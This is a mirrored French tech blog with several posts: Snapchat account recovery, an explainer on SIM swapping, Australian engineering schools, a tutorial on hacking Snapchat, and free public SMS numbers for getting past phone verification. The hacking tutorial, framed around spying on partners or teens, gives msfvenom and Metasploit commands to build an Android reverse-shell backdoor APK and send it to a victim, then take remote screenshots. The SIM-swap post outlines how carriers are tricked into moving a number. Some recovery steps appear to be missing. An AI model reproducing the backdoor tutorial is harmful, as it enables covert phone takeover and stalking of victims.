PROJET AUTOBLOG


FunInformatique

Site original : FunInformatique

⇐ retour index

Comment récupérer un compte Snapchat piraté ?

jeudi 10 juin 2021 à 17:31

Snapchat est un des réseaux sociaux les plus utilisés dans le monde par les jeunes. En France, il totalise 16,6 millions d’utilisateurs actifs quotidiens.

Snapchat permet de partager de courtes vidéos, des photos avec filtres pour interagir avec vos amis. Il permet également de chatter sans laisser de traces car sa particularité est que la durée de vie d’un message est limité.

Cette plate-forme de médias sociaux est largement utilisée par la plupart des gens du monde entier, c’est pourquoi elle est parmi les principales cibles des pirates informatiques.

Donc, si malheureusement, votre compte Snapchat a été piraté, vous trouverez ici toutes les informations utiles pour le récupérer.

Si votre adresse e-mail ou votre numéro de téléphone n’a pas été modifié

Les pirates ont tendance à modifier ou à supprimer l’adresse e-mail ou le numéro de téléphone du compte Snapchat qu’ils piratent ; mais si vous agissez assez rapidement, vous pourriez avoir de la chance et récupérer votre compte Snapchat facilement.

Alors, voici les étapes à suivre pour récupérer un compte Snapchat:

Si votre adresse e-mail ou votre numéro de téléphone a été modifié

Si malheureusement l’adresse e-mail ou le numéro de téléphone de votre compte Snapchat a été modifié ou supprimé par le hacker, il peut être assez difficile de le récupérer, cependant, il existe encore une solution que vous pouvez essayer.

Ce sont les deux moyens que vous pouvez utiliser pour récupérer votre compte Snapchat piraté.

The post Comment récupérer un compte Snapchat piraté ? first appeared on FunInformatique.

SIM Swaping: pirater une carte SIM facilement

lundi 7 juin 2021 à 16:39

Saviez-vous que le vol de numéro de téléphone est possible ? En effet, les carte SIM peuvent être détournées pour obtenir un contrôle total sur le numéro de téléphone d’une autre personne.

C’est le principe de SIM Swaping ou l’échange de carte SIM en français.

Face à cette nouvelle menace, il est temps de voir ce qu’est le SIM Swaping, comment fonctionne cette attaque et comment s’en prémunir.

SIM Swaping, c’est quoi ?

Également connu sous le nom de détournement de carte SIM et de division de carte SIM, SIM Swaping est une attaque informatique qui consiste à se faire passer pour sa victime auprès de son opérateur de téléphonie mobile dans le but  de « voler » son numéro de téléphone portable.

Comment pirater une carte SIM ?

piratage carte SIM
Schéma de piratage carte SIM

Pour que l’attaque fonctionne, le cybercriminel collectera d’abord des informations sur la victime, souvent en parcourant le Web et en recherchant chaque bribe de données que la victime potentielle peut avoir (sur)partagée.

Les informations personnelles de la victime peuvent également être glanées à partir de violations ou de fuites de données connues, ou via des techniques d’ingénierie sociale, telles que le phishing, où le Footprinting.

Ensuite, le pirate informatique appelle tout simplement votre opérateur en se faisant passer pour vous. Il prétexte un problème de carte, de perte ou autre pour demander le transfert de votre numéro sur une nouvelle carte SIM, qu’il possède ou qu’il recevra simplement par la poste !

Mais comment fait-il pour convaincre le service client ?

En vérité, cela est assez simple, un peu d’aplomb, de psychologie et quelques infos personnelles sur vous suffisent pour pirater une carte SIM. Avec vos date de naissance, adresse et compte mail, cela est généralement suffisant pour obtenir beaucoup.

Une fois la nouvelle carte reçue, l’attaquant peut simplement l’insérer dans son téléphone et l’activer : cela a pour effet de désactiver l’ancienne carte, et offre aux attaquants la possibilité d’utiliser la nouvelle carte SIM pour réinitialiser l’accès à certains comptes ou encore contourner l’authentification multi-facteurs si celle ci passe par un SMS.

Qu’est-ce qui rend cette attaque si dangereuse ?

Déjà, le pirate va donc recevoir vos appels et SMS à votre place et même pouvoir répondre à vos contacts en se faisant passer pour vous. Cette attaque peut avoir des conséquences sur votre vie personnelle et professionnelle.

Si vous utilisez une synchronisation de vos contacts et échanges avec un compte en ligne, il peut même hacker ces derniers et accéder à vos historiques.

Un pirate peut aussi avoir accès à votre vie numérique sur les réseaux et outils de communication en ligne puisque beaucoup vous proposent d’utiliser votre numéro de téléphone comme identifiant secondaire et moyen de connexion d’urgence.

Le cofondateur de Twitter victime de SIM Swaping

Pendant l’été 2019, même le cofondateur de Twitter, Jack Dorsey, a été victime de piratage par échange de carte SIM ! Ses 4 millions d’abonnés ont découvert le 30 août des messages insultants et raciste publiés sur son propre compte Twitter. Cela, n’aura duré qu’un quart d’heure, mais cet “exploit” retentissant a révélé au grand public une menace qui existe depuis l’apparition des smartphones.

Pour réussir ce hack, Outre le SIM Swapping, les pirates de Chuckling Squad ont utilisé Cloudhopper, un service permettant de tweeter par SMS. Ce dernier vérifie que le SMS a bien été envoyé par le numéro de téléphone rattaché au compte Twitter avant de le publier sous forme de tweet.

Comment se protéger ?

Commencez par limiter les informations personnelles que vous partagez en ligne, évitez de publier votre nom complet, adresse, numéro de téléphone.

Une autre chose que vous devriez éviter est de trop partager des détails de votre vie personnelle : il est probable que vous en ayez inclus certains aspects dans vos questions de sécurité qui sont utilisées pour vérifier votre identité.

Ensuite, même s’il est recommandé d’utiliser la double authentification, mieux vaut désormais éviter celle qui repose sur l’envoi d’un SMS

Au lieu de cela, optez pour l’utilisation d’autres formes d’authentification à deux facteurs, telles qu’une application d’authentification installé sur votre mobile ou une clé USB d’authentification.

The post SIM Swaping: pirater une carte SIM facilement first appeared on FunInformatique.

Les 3 meilleures écoles d’ingénieurs informatique en Australie

vendredi 4 juin 2021 à 15:09

L’Australie attire depuis longtemps des étudiants du monde entier en raison de son excellent enseignement technique. Il accueille environ 800 000 étudiants chaque année.

Le pays offre non seulement d’excellents programmes de premier cycle et des cycles supérieurs en génie informatique, mais offre également une variété de diplômes de certificat dans le domaine par le biais de ses instituts TAFE .

Toutes les écoles d’Australie ont une excellente réputation et rayonnent au point de vue international. Cependant, parmi les nombreux  écoles du pays, 3 sortent du lot.

Dans cet article, je partage avec vous les 3 meilleures écoles d’ingénieurs d’Australie. En outre, je vais réponde à différentes questions sur les études en Australie. ,

Quel est le coût des études d’ingénierie en Australie ?

Les études en Australie ont un coût important pour les étudiants français. Et à moins d’être boursier, vous devez payer les frais de scolarité requis pour votre programme d’ingénierie informatique.

Plusieurs critères sont à prendre en compte pour estimer le coût de votre formation en Australie :

Ainsi, en tant qu’étudiant international, vos frais de scolarité sont généralement complets. Pour un baccalauréat, le nombre pourrait être compris entre 20 000 et 45 000 AUD par an. Et les frais de scolarité pour une maîtrise et de doctorat tournent environ 22 000 à 50 000 AUD par an.

Visas étudiants

Pour étudier en Australie, vous devrez obtenir un visa pour l’Australie. Pour cela, vous devez être en mesure de prouver au ministère de l’Intérieur que vous remplissez les principales conditions de visa d’étudiant australien.

De quel visa avez-vous besoin ?

Le visa dont vous avez besoin dépend du type d’études que vous souhaitez effectuer et de la durée de votre séjour en Australie. Vous pouvez en savoir plus sur chaque type de visa sur le site Web du ministère australien de l’Immigration et de la Protection des frontières (DIBP).

Mais en bref, vous aurez généralement besoin de :

Enfin, pour en savoir plus sur les détails du processus de visa étudiant et ce dont vous avez besoin pour entrer dans le pays, regardez cet article: conditions relatives au visa pour l’Australie.

3 meilleurs écoles d’ingénieurs informatique en Australie

Vous trouverez ci-dessous la liste des 3 meilleures écoles informatique qui non seulement se classent parmi les meilleures en Australie, mais ont également une réputation mondiale à leur actif.

Université de Melbourne

L’université de Melbourne est aujourd’hui la première université d’Australie selon les classements mondiaux. Elle est située à Melbourne, la capitale de l’État du Victoria en Australie. C’est la deuxième plus ancienne université d’Australie et la plus ancienne du Victoria.

Melbourne est connue pour offrir aux étudiants une expérience bien plus qu’un simple apprentissage structuré. En matière de technologie, les diplômés de Melbourne sont une force à prendre en compte.

Elle compte plus de 40 000 étudiants encadrés par près de 6 000 enseignants.

Visitez l’université de Melbourne

Université de Nouvelle-Galles du Sud

l’UNSW, fondée en 1949, est considérée comme l’une des meilleures universités australiennes pour ses centres de recherches et d’enseignement dans de nombreux domaines.

Elle a été développée dans le but de répondre aux nouvelles exigences de la technologie en pleine croissance.

Les diplômés de l’université sont très recherchés par les employeurs et leurs salaires de début de carrière sont plus élevés que la moyenne australienne.

Constamment classée comme la principale faculté d’ingénierie informatique en Australie, leur enseignement créatif et leur apprentissage pratique façonnent leurs diplômés en futurs leaders de l’ingénierie.

Visitez l’université

Université de Sydney

Fondée en 1850, l’Université de Sydney est est la plus ancienne université d’Australie.

C’est une université de recherche ouverte, connue pour être l’une des meilleures universités du monde. En outre, elle a reçu une charte royale de la reine Victoria en 1858. Après avoir reçu la charte royale, les diplômes délivrés par l’université ont été reconnus comme égaux à ceux délivrés par les universités du Royaume-Uni.

Visitez l’université de Sysdney

The post Les 3 meilleures écoles d’ingénieurs informatique en Australie first appeared on FunInformatique.

Comment pirater un compte Snapchat ?

lundi 31 mai 2021 à 20:46

Comment pirater Snapchat ? Voici une question que la plupart des utilisateurs de Snapchat se posent. Comment pirater un compte Snapchat pour savoir si mon conjoint est infidèle ? Comment pirater le compte Snapchat de mon ados pour contrôler ce que fait sur son smartphone ?

Bref, tout le monde à une bonne excuse de vouloir pirater un compte Snapchat.

La première chose que fait l’internaute, c’est généralement d’essayer de trouver la réponse en faisant une recherche Google.

Devinez quoi ? Et bien, sur toute la première page de résultat, on trouve une grande liste d’arnaqueurs qui promettent de récupérer des vidéos, des photos et des journaux de chat de n’importe quel compte Snapchat.

Un site frauduleux

Il y a des tas d’arnaques en tout genre sur la première page Google. Mais, désolé de vous dire que ces sites vous donne de faux espoirs.

Tous ces programmes sont créés dans le but de récupérer votre mot passe Snapchat, ou pour voler votre argent ou encore pour prendre le contrôle de votre smartphone.

Alors comment pirater un compte Snapchat ?

Un programme de piratage direct n’existe pas. En aucun cas, il n’y aura un miracle qui vous fera pirater une personne en deux minutes.

Cependant, il est impossible de garantir une sécurité à 100 %.  N’importe quel système peut être piraté.

Donc pour vraiment pirater un compte Snapchat, il faut être patient et intelligent. Si vous voulez des outils spécialisés, vous pouvez par exemple vous orienter vers la distribution Kali Linux.

Pirater un Snapchat avec l’outil Metasploit

Remarque: Cet article est à but éducatif et préventif uniquement. Apprendre l’attaque pour mieux se protéger. Vous êtes le seul(e) responsable de vos actions, et aucune responsabilité de la part de l’instructeur ne sera engagée quant à la mauvaise utilisation du contenu enseigné.

Cette technique consiste a exploiter les failles du système Android, iOS ou des applications installés dedans.

Chaque jour, des nouvelles failles de sécurité sont découverte sur les systèmes Android et iOS. Ces failles sont exploitable et permettent ainsi à une personne de prendre le contrôle total d’un smartphone ou d’une tablette.

Pour exploiter ces failles, un pirate crée une fausse application Android malveillante et l’envoie à une victime. Une fois l’application est installée sur le smartphone de la victime, il est facile de prendre le contrôlé de son smartphone et pirater son compte Snapchat.

Pour cela, les pirates utilisent l’outil Metasploit disponible sur la distribution Linux Kali linux.

Metasploit, c’est quoi ?

Metasploit est un outil qui permet le développement et l’exécution d’exploits contre un appareil distante. Il contient des centaines d’exploits et permettront d’attaquer tout type de machines connecté à internet.

Si vous voulez tester cette méthode sur votre téléphone et vous avez un ordinateur sous Windows alors je vous conseille créer une machine virtuel faisant tourner Kali Linux. Pour cela, il suffit de télécharger VMware et une image de Kali Linux. Metasploit est déjà pré-installé dessus.

Pour plus détails, regardez ce tutoriel: comment installer Kali Linux sur une machine Windows.

Commandes Linux pour pirater Snapchat

Création de l’application Backdoor.apk

Apres l’installation de Kali Linux sur votre machine, ouvrez le terminal Kali Linux. Ensuite, nous allons créé le trojan APK (c’est l’application que nous allons envoyer à la cible).

Pour cela, tapez la commande suivante:

msfvenom -p android / meterpreter / reverse_tcp lhost = 192.168.1.4 lport = 4000> /home/backdoor.apk

et appuyez sur Entrée. Cela créera un l’application APK backdoor.apk dans le dossier.

N’oubliez pas de replacer LHOST avec votre propre adresse IP.

Backdoor.apk est l’apk de piratage qui sera utilisé pour pirater le compte Snapchat d’une victime. Elle doit être installé sur le téléphone Android de la victime.

Vous pouvez envoyer ce fichier en utilisant divers sites Web de partage de fichiers comme Wetransfer (ce site Web ne nécessite pas d’enregistrement d’utilisateur).

Enfin, vous trouverez le backdoor.apk dans le répertoire Home.

Configuration de l’application Backdoor.apk

Maintenant, il faut configurer cette application Backdoor.apk. Pour cela, nous allons ouvrir un autre terminal et lancer l’outil Metasploit.

Ensuite, tapez les commandes suivantes:

msfconsole (permet d’ouvrir l’outil métasploit)
use /multi/handler (permet de sélectionner l’exploit handler)
set payload android/meterpreter/reverse_tcp
set lhost votre_adresse_ip
exploit

Voila le module est bien configuré, il reste maintenant d’envoyer l’APK à une victime en utilisant l’ingénierie sociale. Lorsque la victime installera l’application sur son mobile, Metasploit vous indiquera quelque chose comme ceci :

Il ne nous reste plus qu’à ouvrir une session Meterpreter à distance sur le mobile de la victime :

msf > sessions -i 1
[*] Starting interaction with 1…

Nous avons désormais le contrôle total du smartphone.  Par exemple : nous pouvons faire des captures d’écran de à distance de l’application Snapchat:

meterpreter > use espia
Loading extension espia…success.
meterpreter > screenshot snapchat.jpg

Conclusion

Pirater un compte Snapchat, n’est pas du tout une chose facile. Cette technique n’est pas fiable à 100%. Si la cible est bien protégé, vous n’aurez rien a faire.
J’espère qu’a travers ce tutoriel, vous avez bien compris comment fonctionne le piratage des applications Android ou iOS comme Snapchat.

Si vous avez des ajouts pour rendre cette page une base de donnée concernant Snapchat, n’hésitez pas à poster votre commentaire !

The post Comment pirater un compte Snapchat ? first appeared on FunInformatique.

Contourner la vérification par SMS sur n’importe quel site

lundi 31 mai 2021 à 16:03

De nos jours, plusieurs sites sur le Web, nous demandent de leurs indiquer notre numéro de téléphone pour confirmer notre identité et pour compléter une simple inscription. Mais voilà, donner son vrai numéro de téléphone à des inconnu, peut poser quelques problèmes de vie privée.

Alors pourquoi utilisent-ils ce système qui nous oblige à délivre notre numéro de téléphone mobile ?

Bref, je ne sais rien. Par contre, je sais qu’il existe une parade à ça. Plutôt que de donner impunément votre numéro mobile, il existe une astuce pour contourner cette vérification par SMS.

Recourir à quelques services sur le web qui vous offrent des numéros de téléphones sur lesquels vous pouvez recevoir vos messages SMS.

Parmi ces services, je partage avec vous trois adresse que j’utilise personnellement :

Receive-smss

Receive-smss.com est un service gratuit de réception de SMS et de messages vocaux en ligne. Il n’est pas nécessaire de s’enregistrer. Sélectionnez simplement un numéro de téléphone dans la liste. Vous pouvez l’utiliser pour recevoir des messages de Facebook, Telegram, WeChat, VK, PayPal, AliPay et plus.

Accéder à receive-smss.com

GetFreesmsNumber

GetFreeSMSNumber.com est un service Gratuit pour recevoir des messages SMS temporaires et des messages vocaux en ligne.

Visitez getfreesmsnumber.com

SMS-Receive.net

SMS-Receive.net est un site Web qui contient des numéros de téléphone virtuels et des numéros de téléphone réels stockés sur les cartes SIM.

Le site Web fournit aux utilisateurs un service gratuit avec des numéros de téléphone publics où vous pouvez recevoir des SMS en ligne sur divers sites Web sociaux ou forums tels que: NAVERLINE, Yahoo , Microsoft, serverloft , CloudSigma, Facebook , Amazon, VK , OKru, Instagram , RealStatus etc.

Il est possible de confirmer votre inscription en utilisant ces numéros.

N’oubliez pas que tous les messages reçus sur ce service seront visibles par tous les visiteurs et ne pourront pas être supprimés.

contourner_sms-verification

L’avantage de SMS-Receive.net, c’est qu’il propose de nombreux numéros de tél, qui appartiennent à différents pays, très utile en cas de restriction que met en place certains sites web.

Accéder à SMS-Receive.net 

Comment contourner la vérification par SMS ?

verfication-sms

The post Contourner la vérification par SMS sur n’importe quel site first appeared on FunInformatique.